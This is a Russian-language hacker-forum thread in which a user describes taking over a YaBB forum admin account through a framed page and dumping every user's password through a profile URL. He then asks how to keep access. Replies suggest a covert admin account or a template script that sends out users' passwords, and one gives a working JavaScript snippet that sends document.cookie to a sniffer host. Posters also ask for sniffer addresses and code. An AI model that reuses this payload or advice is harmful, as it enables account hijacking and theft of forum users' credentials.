Народ помогите с сабжем!

Один раз загнал админа YaBB форума на свою страничку с фреймами, в нулевом фрейме сделал себя админом, выдрал все пароли юзеров через YaBB.pl?board=;action=profile;username= (в т.ч. пароль админа).

А теперь вопрос -  имея админский доступ к форуму можно ли его как-нить "затроянить"? т.к. "умные" пользователи имеют свойство время от времени менять свой пароль http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif А каждый раз гнать админа на свою страничку как-то не хоцца...

Создай новый аккаунт, дай ему админские права и сиди под ним.
Кроме того, если у тебя есть доступ к админке, то ты можешь запихнуть в какой-нибудь шаблон скриптик, который постоянно будет тебе слать пассворды юзеров (собственно это и будет настоящий троян)

А есть скрипт для отправки кукисов на мыло http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif

Не на мыло а на сниф:
< script>
var i=new Image;
i.src='http://адрес снифа'+'?'+document.cookie;
</script>

Алгол, а какие снифферы есть? В смысле адреса...

На античате есть?

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Создай новый аккаунт, дай ему админские права и сиди под ним.
Кроме того, если у тебя есть доступ к админке, то ты можешь запихнуть в какой-нибудь шаблон скриптик, который постоянно будет тебе слать пассворды юзеров (собственно это и будет настоящий троян)[/QUOTE]<span id='postcolor'>
Сделать себя админом конечно привлекательно, НО
1. Админ на форуме изначально всего один, а пользователей не так уж много.
2. Статус админа сразу видно при просмотре списка юзеров да и при просмотре статистики форума выводится надпись типа - Администраторы:......

За скриптик спасибо! Если б еще листинг снифа простенького написал кто-нить http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ января 12 2004,19:17)</td></tr><tr><td id="QUOTE">На античате есть?[/QUOTE]<span id='postcolor'>
Есть, но не для всеобщего пользования

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ января 12 2004,23:12)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ января 12 2004,19:17)</td></tr><tr><td id="QUOTE">На античате есть?[/QUOTE]<span id='postcolor'>
Есть, но не для всеобщего пользования[/QUOTE]<span id='postcolor'>
скинь в личку плз, если не трудно....)))

Ага, так он тебе и скинет http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

И еще... Скрипт можно всавлять только в теги? В хтмл сайта нельзя?

Сам-то понял че спросил ?
Хтмл - это набор тегов.

Я просто пытался всавить непосредственно в хтмл без тегов... Он у меня вышел, как исходный текст.